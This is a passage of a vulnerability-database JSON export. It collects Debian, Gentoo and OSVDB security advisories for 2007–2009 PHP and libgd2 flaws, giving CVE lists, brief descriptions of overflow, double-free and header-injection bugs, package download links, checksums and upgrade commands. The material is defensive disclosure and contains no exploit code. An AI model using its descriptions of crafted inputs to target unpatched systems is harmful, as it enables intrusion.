184d49bb465e292da5f0b8d2dd68941f\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 12724 102a9a02542e6f16e645ad3040965143\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 4854 911d9a5a8f0af78ba764c0a80ca02342\n 
These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2007-04-26T00:00:00", "published": "2007-04-26T00:00:00", "id": "DEBIAN:DSA-1282-1:EE0D3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00038.html", "title": "[SECURITY] [DSA 1282-1] New php4 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.8, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-10-16T22:13:33", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1283-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nApril 29th, 2007 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : php5\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2007-1286 CVE-2007-1375 CVE-2007-1376 CVE-2007-1380 CVE-2007-1453 CVE-2007-1454 CVE-2007-1521 CVE-2007-1583 CVE-2007-1700 CVE-2007-1711 CVE-2007-1718 CVE-2007-1777 CVE-2007-1824 CVE-2007-1887 CVE-2007-1889 CVE-2007-1900\n\nSeveral remote vulnerabilities have been discovered in PHP, a\nserver-side, HTML-embedded scripting language, which may lead to the\nexecution of arbitrary code. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2007-1286\n Stefan Esser discovered an overflow in the object reference handling\n code of the unserialize() function, which allows the execution of\n arbitrary code if malformed input is passed from an application.\n\nCVE-2007-1375\n Stefan Esser discovered that an integer overflow in the substr_compare()\n function allows information disclosure of heap memory.\n\nCVE-2007-1376\n Stefan Esser discovered that insufficient validation of shared memory\n functions allows the disclosure of heap memory.\n\nCVE-2007-1380\n Stefan Esser discovered that the session handler performs\n insufficient validation of variable name length values, which allows\n information disclosure through a heap information leak.\n\nCVE-2007-1453\n Stefan Esser discovered that the filtering framework performs insufficient\n input validation, which allows the execution of arbitrary code through a\n buffer underflow.\n\nCVE-2007-1454\n Stefan Esser discovered that the filtering 
framework can be bypassed \n with a special whitespace character.\n\nCVE-2007-1521\n Stefan Esser discovered a double free vulnerability in the\n session_regenerate_id() function, which allows the execution of\n arbitrary code. \n\nCVE-2007-1583\n Stefan Esser discovered that a programming error in the mb_parse_str()\n function allows the activation of "register_globals".\n\nCVE-2007-1700\n Stefan Esser discovered that the session extension incorrectly maintains\n the reference count of session variables, which allows the execution of\n arbitrary code.\n\nCVE-2007-1711\n Stefan Esser discovered a double free vulnerability in the session\n management code, which allows the execution of arbitrary code. \n\nCVE-2007-1718\n Stefan Esser discovered that the mail() function performs\n insufficient validation of folded mail headers, which allows mail\n header injection.\n\nCVE-2007-1777\n Stefan Esser discovered that the extension to handle ZIP archives\n performs insufficient length checks, which allows the execution of\n arbitrary code.\n\nCVE-2007-1824\n Stefan Esser discovered an off-by-one in the filtering framework, which\n allows the execution of arbitrary code.\n\nCVE-2007-1887\n Stefan Esser discovered that a buffer overflow in the sqlite extension\n allows the execution of arbitrary code.\n\nCVE-2007-1889\n Stefan Esser discovered that the PHP memory manager performs an\n incorrect type cast, which allows the execution of arbitrary code\n through buffer overflows. \n\nCVE-2007-1900\n Stefan Esser discovered that incorrect validation in the email filter\n extension allowed the injection of mail headers.\n\n\nThe oldstable distribution (sarge) doesn't include php5.\n\nFor the stable distribution (etch) these problems have been fixed\nin version 5.2.0-8+etch3.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 5.2.0-11.\n\nWe recommend that you upgrade your PHP packages. 
Packages for the arm,\nhppa and mipsen architectures are not yet available. They will be\nprovided later.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2007-04-29T00:00:00", "published": "2007-04-29T00:00:00", "id": "DEBIAN:DSA-1283-1:3DFD9", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00039.html", "title": "[SECURITY] [DSA 1283-1] New php5 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-10-16T22:13:48", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1936-1 security@debian.org\nhttp://www.debian.org/security/ Giuseppe Iuculano\nNovember 17, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : libgd2\nVulnerability : several\nProblem type : local (remote)\nDebian-specific: no\nCVE Id : CVE-2007-0455 CVE-2009-3546\nDebian Bug : 408982 552534\n\nSeveral vulnerabilities have been discovered in libgd2, a library for\nprogrammatic graphics creation and manipulation. 
The Common\nVulnerabilities and Exposures project identifies the following problems:\n\nCVE-2007-0455\n\n Kees Cook discovered a buffer overflow in libgd2's font renderer. An\n attacker could cause denial of service (application crash) and\n possibly execute arbitrary code via a crafted string with a JIS\n encoded font. This issue only affects the oldstable distribution\n (etch).\n\nCVE-2009-3546\n\n Tomas Hoger discovered a boundary error in the "_gdGetColors()"\n function. An attacker could conduct buffer overflow or buffer\n over-read attacks via a crafted GD file.\n\nFor the oldstable distribution (etch), these problems have been fixed in\nversion 2.0.33-5.2etch2.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.0.36~rc1~dfsg-3+lenny1.\n\nFor the upcoming stable distribution (squeeze) and the unstable\ndistribution (sid), these problems have been fixed in version\n2.0.36~rc1~dfsg-3.1.\n\nWe recommend that you upgrade your libgd2 packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\n
http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch2_s390.deb\n Size/MD5 checksum: 145288 e586279ab34b40581df878e8d54a5d00\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch2_s390.deb\n Size/MD5 checksum: 206304 81286d7ef378f995064bda8985405176\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch2_s390.deb\n Size/MD5 checksum: 344916 2b7dc027100094bcdfac3973ae42ec8a\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch2_s390.deb\n Size/MD5 checksum: 341596 48fb7fd9410a6c56c7348ee58e44c0db\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch2_sparc.deb\n Size/MD5 checksum: 337040 3e570757ccbed59f81cc9635908dcf52\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch2_sparc.deb\n Size/MD5 checksum: 195478 5394f4b16849e0324bf8604cd96855fe\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch2_sparc.deb\n Size/MD5 checksum: 339032 c33f2dd72b9c4d9e0d9d296b2d76c8ae\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch2_sparc.deb\n Size/MD5 checksum: 144496 ed5d416ed606a7512fd23b640ef0d48f\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch2_sparc.deb\n Size/MD5 checksum: 197346 472999df848cf226b765a36f10cb01ae\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.36~rc1~dfsg-3+lenny1.dsc\n Size/MD5 checksum: 1612 861ee81768001cad3679f7e6b4c16268\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.36~rc1~dfsg-3+lenny1.diff.gz\n Size/MD5 checksum: 29122 
ba98bcc559da7cfaf6af0269e6d6c973\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.36~rc1~dfsg.orig.tar.gz\n Size/MD5 checksum: 761899 0f4d2fa45627af0e87fcb74f653b66dd\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_alpha.deb\n Size/MD5 checksum: 236996 97687d52155c579eac4694129a3036b0\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_alpha.deb\n Size/MD5 checksum: 234324 888ccfbe94b37d807e520d17ba555373\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_alpha.deb\n Size/MD5 checksum: 389038 68e57a70ac9deeb88c32ded9f4d35db5\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_alpha.deb\n Size/MD5 checksum: 386062 d08f7a705d3b7853accb539322d93404\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_alpha.deb\n Size/MD5 checksum: 169056 0d8325242d90e9be315eceb4f4c3b2ce\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_amd64.deb\n Size/MD5 checksum: 226128 a341c0823799c1a17c57f3ab641ed9fc\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_amd64.deb\n Size/MD5 checksum: 363824 9f5ee16778aae72857045d83c24aa0a0\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_amd64.deb\n Size/MD5 checksum: 367104 c5d257e24617236b8a66ffebe49bc998\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_amd64.deb\n Size/MD5 checksum: 165016 35a7308138a071c9790b3c68071e67eb\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_amd64.deb\n Size/MD5 checksum: 228642 a923422ad1c829794894220d66e31ad8\n\narm architecture (ARM)\n\n 
http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_arm.deb\n Size/MD5 checksum: 218166 d01652ad19f739742c9ecd8bb4356c2e\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_arm.deb\n Size/MD5 checksum: 360062 31b1b9c12e2e30d2a6da2bef039fac19\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_arm.deb\n Size/MD5 checksum: 357534 69ba937ded46718124339895569eae97\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_arm.deb\n Size/MD5 checksum: 165706 0017b28a56a67957aba834671b4ed04a\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_arm.deb\n Size/MD5 checksum: 220304 d5a95205b1d4d63ef7910e1c66cc5064\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_armel.deb\n Size/MD5 checksum: 220534 13e41fb531753eac4425352e489ac204\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_armel.deb\n Size/MD5 checksum: 359206 f16a9f312a1661e6be8c2aef94d699df\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_armel.deb\n Size/MD5 checksum: 361246 1d18d7e113b95b5f780fcbbc9e7fe801\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_armel.deb\n Size/MD5 checksum: 222682 0f1b597856bd6c52fbb60ed0649f485a\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_armel.deb\n Size/MD5 checksum: 166342 096ac81396b8664a2ed0280ea142a7d7\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_hppa.deb\n Size/MD5 checksum: 228220 094ed936f86c346642bae66be78fe4a5\n 
http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_hppa.deb\n Size/MD5 checksum: 230744 b96bb2333dcd2c415d7a6cdfa5c5c85c\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_hppa.deb\n Size/MD5 checksum: 371374 6f2e96e693804722d51efe17a7384c0a\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_hppa.deb\n Size/MD5 checksum: 167492 ac52ea686398bbe6bb0050d7f23380c7\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_hppa.deb\n Size/MD5 checksum: 374120 8280bee041cda85b2d7590485668d4d7\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_i386.deb\n Size/MD5 checksum: 358974 797889cfec6a71fbc8dea99014a22d5d\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_i386.deb\n Size/MD5 checksum: 356634 8687049dc7503710e7b9798818ec10a0\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_i386.deb\n Size/MD5 checksum: 222606 640114552f4d79220a99ed754bc8b149\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_i386.deb\n Size/MD5 checksum: 220836 7fe4a8f4404f923bb3c2753c8801b945\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_i386.deb\n Size/MD5 checksum: 164292 877bc158847f598be3175fcf1caca555\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_ia64.deb\n Size/MD5 checksum: 262616 384ba9e56c2243fbf678cbd2066c421a\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_ia64.deb\n Size/MD5 checksum: 407462 a281c696e7df4c6b28fb1d00d889ad4e\n 
http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_ia64.deb\n Size/MD5 checksum: 170536 91e3b8b3bdec6437e586ecad76448d7b\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_ia64.deb\n Size/MD5 checksum: 259726 a1419ac46090a5b3ac6fadc031c94361\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_ia64.deb\n Size/MD5 checksum: 404324 beaf8d3f61ac17a3e1f9f8ec0fb98f83\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_mips.deb\n Size/MD5 checksum: 368870 3f8abbc6d77a5aad3fb30b47a5a159ca\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_mips.deb\n Size/MD5 checksum: 222342 1e65ebf2348b44765b21fc2d50760d40\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_mips.deb\n Size/MD5 checksum: 224514 b852f45244d7fc1da80ad7baf7faa7a3\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_mips.deb\n Size/MD5 checksum: 166492 4209fb354092ffe728ad6c877bf5b53a\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_mips.deb\n Size/MD5 checksum: 371392 cbd8852931c6b0e5217982e215f688f7\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_mipsel.deb\n Size/MD5 checksum: 223660 0eff65fc6483e460c4e6c21ebaae951a\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_mipsel.deb\n Size/MD5 checksum: 373182 20190a16e9c743fe16f8a169e159ec8a\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_mipsel.deb\n Size/MD5 checksum: 167336 fec0121ea4ddb045fb9aed273ebe3bbf\n 
http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_mipsel.deb\n Size/MD5 checksum: 225550 f9bf5ad9cb2974b32d183e6f204f206d\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_mipsel.deb\n Size/MD5 checksum: 370838 e0959c73988a9c10fad4a9325d6332d6\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_powerpc.deb\n Size/MD5 checksum: 177126 319718191c09c50f6fba336f043277b1\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_powerpc.deb\n Size/MD5 checksum: 232182 740ccf088ae1cc6473b088dfa3afd897\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_powerpc.deb\n Size/MD5 checksum: 367906 1c217aa962a581c638736677eb18d640\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_powerpc.deb\n Size/MD5 checksum: 229860 bef4bcd55e5f91278ea889e782a08772\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_powerpc.deb\n Size/MD5 checksum: 370242 5eb51419b12f3d0a9e95cc1257256ed5\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_s390.deb\n Size/MD5 checksum: 230344 e90c8c56df7081e36153be0c51d0596c\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_s390.deb\n Size/MD5 checksum: 365176 5bfb3d0987d0cddcdb72a453fd7acd58\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_s390.deb\n Size/MD5 checksum: 228024 4b902fd21e351d5ba17bfb3d90cb7289\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_s390.deb\n Size/MD5 checksum: 167880 676ed67187ddfddb50c8d8779df61571\n 
http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_s390.deb\n Size/MD5 checksum: 367886 06b0e25ee20930b4043c5496f2aab0e3\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_sparc.deb\n Size/MD5 checksum: 221040 d745bb60f8419d7079a2886865f89ca7\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_sparc.deb\n Size/MD5 checksum: 358368 f4190378385c02f7d6c339969d607e49\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_sparc.deb\n Size/MD5 checksum: 219262 ba91b74900bf16efc42d805d818d47dd\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_sparc.deb\n Size/MD5 checksum: 167142 ec45c768f5fc3b0d1994f6302e939e42\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_sparc.deb\n Size/MD5 checksum: 360622 00d362606ec08c5b7633e5358a7a805c\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2009-11-17T21:15:19", "published": "2009-11-17T21:15:19", "id": "DEBIAN:DSA-1936-1:83926", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00259.html", "title": "[SECURITY] [DSA 1936-1] New libgd2 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:22", "bulletinFamily": 
"unix", "description": "### Background\n\nPHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. \n\n### Description\n\nSeveral vulnerabilities were found in PHP, most of them during the Month Of PHP Bugs (MOPB) by Stefan Esser. The most severe of these vulnerabilities are integer overflows in wbmp.c from the GD library (CVE-2007-1001) and in the substr_compare() PHP 5 function (CVE-2007-1375). Ilia Alshanetsky also reported a buffer overflow in the make_http_soap_request() and in the user_filter_factory_create() functions (CVE-2007-2510, CVE-2007-2511), and Stanislav Malyshev discovered another buffer overflow in the bundled XMLRPC library (CVE-2007-1864). Additionally, the session_regenerate_id() and the array_user_key_compare() functions contain a double-free vulnerability (CVE-2007-1484, CVE-2007-1521). Finally, there exist implementation errors in the Zend engine, in the mb_parse_str(), the unserialize() and the mail() functions and other elements. \n\n### Impact\n\nRemote attackers might be able to exploit these issues in PHP applications making use of the affected functions, potentially resulting in the execution of arbitrary code, Denial of Service, execution of scripted contents in the context of the affected site, security bypass or information leak. \n\n### Workaround\n\nThere is no known workaround at this time. 
\n\n### Resolution\n\nAll PHP 5 users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/php-5.2.2\"\n\nAll PHP 4 users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/php-4.4.7\"", "modified": "2008-03-29T00:00:00", "published": "2007-05-26T00:00:00", "id": "GLSA-200705-19", "href": "https://security.gentoo.org/glsa/200705-19", "type": "gentoo", "title": "PHP: Multiple vulnerabilities", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nPHP contains a flaw that may allow a context-dependent attacker to execute arbitrary code. The issue is due to the GD library (libgd) not properly sanitizing user-supplied input to the createwbmp or readwbmp functions in wbmp.c. Using a specially crafted Wireless Bitmap (WBMP) image with a large width or height value, an attacker could trigger an integer overflow and execute arbitrary code.\n## Solution Description\nUpgrade to version 4.4.7, 5.2.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP contains a flaw that may allow a context-dependent attacker to execute arbitrary code. The issue is due to the GD library (libgd) not properly sanitizing user-supplied input to the createwbmp or readwbmp functions in wbmp.c. 
Using a specially crafted Wireless Bitmap (WBMP) image with a large width or height value, an attacker could trigger an integer overflow and execute arbitrary code.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://cvs.php.net/viewvc.cgi/php-src/ext/gd/libgd/wbmp.c?r1=1.2.4.1&r2=1.2.4.1.8.1\nVendor Specific News/Changelog Entry: http://cvs.php.net/viewvc.cgi/php-src/ext/gd/libgd/wbmp.c?revision=1.2.4.1.8.1&view=markup\n[Secunia Advisory ID:25151](https://secuniaresearch.flexerasoftware.com/advisories/25151/)\n[Secunia Advisory ID:25192](https://secuniaresearch.flexerasoftware.com/advisories/25192/)\n[Secunia Advisory ID:24814](https://secuniaresearch.flexerasoftware.com/advisories/24814/)\n[Secunia Advisory ID:24924](https://secuniaresearch.flexerasoftware.com/advisories/24924/)\n[Secunia Advisory ID:26235](https://secuniaresearch.flexerasoftware.com/advisories/26235/)\n[Secunia Advisory ID:24965](https://secuniaresearch.flexerasoftware.com/advisories/24965/)\n[Secunia Advisory ID:24909](https://secuniaresearch.flexerasoftware.com/advisories/24909/)\n[Secunia Advisory ID:25445](https://secuniaresearch.flexerasoftware.com/advisories/25445/)\n[Secunia Advisory ID:24945](https://secuniaresearch.flexerasoftware.com/advisories/24945/)\nRedHat RHSA: RHSA-2007:0153\nRedHat RHSA: RHSA-2007:0155\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:089\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-April/000176.html\nOther Advisory URL: http://ifsec.blogspot.com/2007/04/php-521-wbmp-file-handling-integer.html\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070501-01-P.asc\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200705-19.xml\nOther Advisory URL: http://www.slackware.org/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.470053\nOther Advisory URL: 
http://docs.info.apple.com/article.html?artnum=306172\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0131.html\nISS X-Force ID: 33453\nFrSIRT Advisory: ADV-2007-1269\nFrSIRT Advisory: ADV-2007-2732\n[CVE-2007-1001](https://vulners.com/cve/CVE-2007-1001)\nBugtraq ID: 23357\nBugtraq ID: 25159\n", "modified": "2007-04-10T07:03:45", "published": "2007-04-10T07:03:45", "href": "https://vulners.com/osvdb/OSVDB:34671", "id": "OSVDB:34671", "title": "PHP wbmp.c createwbmp / readwbmp Function WBMP Handling Overflow", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nPHP contains a flaw that may allow a context-dependent attacker to elevate privileges. The issue is due to the unserializer not properly validating user-supplied input. By passing crafted data, an attacker can overwrite variables pointing to the GLOBALS array or the session data in _SESSION allowing for the execution of arbitrary code.\n## Short Description\nPHP contains a flaw that may allow a context-dependent attacker to elevate privileges. The issue is due to the unserializer not properly validating user-supplied input. 
